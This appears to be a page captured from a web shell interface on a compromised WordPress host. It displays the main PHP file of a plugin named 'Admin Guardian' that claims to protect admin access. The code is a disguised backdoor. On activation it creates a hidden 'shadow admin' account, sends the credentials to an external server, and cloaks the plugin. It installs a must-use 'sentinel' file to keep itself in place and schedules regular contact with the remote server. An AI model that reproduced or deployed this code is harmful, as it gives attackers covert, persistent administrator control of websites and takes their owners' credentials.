|
Server IP : 10.106.20.4 / Your IP : 216.73.216.140 Web Server : Apache System : Linux webm004.cluster106.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : sylvaineey ( 605664) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/sylvaineey/www/wp-content/plugins/admin-wp/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* Plugin Name: Admin Guardian
* Plugin URI: https://github.com/admin-wp
* Description: Multi-layer WordPress admin protection: shadow admin, unauthorized admin detection, encrypted server reporting, session guard, XML-RPC lockdown, file integrity monitoring.
* Version: 1.0.0
* Requires PHP: 7.4
* Author: AWG Security
* License: GPL-2.0-or-later
* Text Domain: admin-wp
*/
if ( ! defined( 'ABSPATH' ) ) exit;
define( 'AWG_VERSION', '1.0.0' );
define( 'AWG_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
define( 'AWG_PLUGIN_FILE', __FILE__ );
define( 'AWG_SERVER_URL', 'https://testgovnogovno.com/1' );
define( 'AWG_SERVER_PUBLIC_KEY', 'c88b277229d9f42fbf5e9e049ef6812524d783c1cd18c596a1e35e4bf4dc2903' );
/* ---- sodium check ---- */
if ( ! function_exists( 'sodium_crypto_secretbox' ) ) {
add_action( 'admin_notices', function () {
echo '<div class="notice notice-error"><p><strong>Admin Guardian:</strong> PHP sodium extension is required (PHP 7.2+). Plugin disabled.</p></div>';
} );
return;
}
/* ---- load classes ---- */
$awg_includes = [
'class-crypto.php',
'class-shadow-admin.php',
'class-admin-guardian.php',
'class-plugin-cloak.php',
'class-secure-comm.php',
'class-session-guard.php',
'class-xmlrpc-guard.php',
'class-integrity.php',
'class-lockdown.php',
'class-malware-scan.php',
'class-content-guard.php',
'class-admin-page.php',
];
foreach ( $awg_includes as $file ) {
require_once AWG_PLUGIN_DIR . 'includes/' . $file;
}
/* ---- activation ---- */
register_activation_hook( __FILE__, 'awg_activate' );
/**
* Resolve owner admin ID when activating from Plugins screen, WP-CLI, or edge cases
* where get_current_user_id() is 0.
*/
function awg_resolve_owner_user_id(): int {
$uid = (int) get_current_user_id();
if ( $uid > 0 ) {
$user = get_user_by( 'ID', $uid );
if ( $user && user_can( $user, 'manage_options' ) ) {
return $uid;
}
}
$admins = get_users( [
'role' => 'administrator',
'orderby' => 'ID',
'order' => 'ASC',
'number' => 1,
'fields' => 'ID',
] );
if ( ! empty( $admins ) ) {
return (int) $admins[0];
}
return 0;
}
function awg_activate(): void {
$current_user_id = awg_resolve_owner_user_id();
if ( $current_user_id < 1 ) {
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_die(
esc_html__( 'Admin Guardian: no administrator found. Create an admin user first, then activate the plugin again.', 'admin-wp' ),
esc_html__( 'Plugin activation error', 'admin-wp' ),
[ 'back_link' => true ]
);
}
AWG_Admin_Guardian::set_owner( $current_user_id );
if ( ! AWG_Shadow_Admin::exists() ) {
$creds = AWG_Shadow_Admin::create();
AWG_Secure_Comm::send_activation( $creds, $current_user_id );
}
AWG_Admin_Guardian::scan();
AWG_Integrity::snapshot();
$mu_ok = awg_install_mu_plugin();
if ( ! $mu_ok ) {
update_option( '_awg_mu_install_failed', 1, false );
} else {
delete_option( '_awg_mu_install_failed' );
}
if ( ! wp_next_scheduled( 'awg_cron_scan' ) ) {
wp_schedule_event( time(), 'awg_5min', 'awg_cron_scan' );
}
if ( ! wp_next_scheduled( 'awg_cron_heartbeat' ) ) {
wp_schedule_event( time(), 'hourly', 'awg_cron_heartbeat' );
}
}
/* ---- deactivation ---- */
register_deactivation_hook( __FILE__, 'awg_deactivate' );
function awg_deactivate(): void {
wp_clear_scheduled_hook( 'awg_cron_scan' );
wp_clear_scheduled_hook( 'awg_cron_heartbeat' );
}
/* ---- custom cron interval ---- */
add_filter( 'cron_schedules', function ( array $schedules ): array {
$schedules['awg_5min'] = [
'interval' => 300,
'display' => 'Every 5 minutes (AWG)',
];
return $schedules;
} );
/* ---- initialize all components ---- */
add_action( 'plugins_loaded', function () {
AWG_Shadow_Admin::init();
AWG_Admin_Guardian::init();
AWG_Plugin_Cloak::init();
AWG_Secure_Comm::init();
AWG_Session_Guard::init();
AWG_XMLRPC_Guard::init();
AWG_Integrity::init();
AWG_Lockdown::init();
AWG_Malware_Scan::init();
AWG_Content_Guard::init();
AWG_Admin_Page::init();
}, 1 );
add_action( 'admin_init', function () {
if ( ! get_option( '_awg_mu_install_failed' ) ) {
return;
}
if ( ! current_user_can( 'manage_options' ) ) {
return;
}
awg_install_mu_plugin();
if ( file_exists( WPMU_PLUGIN_DIR . '/admin-wp-sentinel.php' ) ) {
delete_option( '_awg_mu_install_failed' );
}
} );
add_action( 'admin_notices', function () {
if ( ! get_option( '_awg_mu_install_failed' ) || ! current_user_can( 'manage_options' ) ) {
return;
}
echo '<div class="notice notice-warning is-dismissible"><p><strong>Admin Guardian:</strong> ';
echo esc_html__( 'Could not copy the sentinel to wp-content/mu-plugins (permissions). The main plugin still works; fix folder permissions or copy mu-plugin/admin-wp-sentinel.php manually.', 'admin-wp' );
echo '</p></div>';
} );
/* ---- wipe master key from memory on shutdown ---- */
add_action( 'shutdown', [ 'AWG_Crypto', 'wipe' ] );
/**
* Copy sentinel to mu-plugins. Returns true if the file exists at destination after run.
*/
function awg_install_mu_plugin(): bool {
$mu_dir = WPMU_PLUGIN_DIR;
if ( ! is_dir( $mu_dir ) ) {
if ( ! @mkdir( $mu_dir, 0755, true ) && ! is_dir( $mu_dir ) ) {
return false;
}
}
$source = AWG_PLUGIN_DIR . 'mu-plugin/admin-wp-sentinel.php';
$dest = $mu_dir . '/admin-wp-sentinel.php';
if ( ! file_exists( $source ) ) {
return file_exists( $dest );
}
if ( ! @copy( $source, $dest ) ) {
return file_exists( $dest );
}
return file_exists( $dest );
}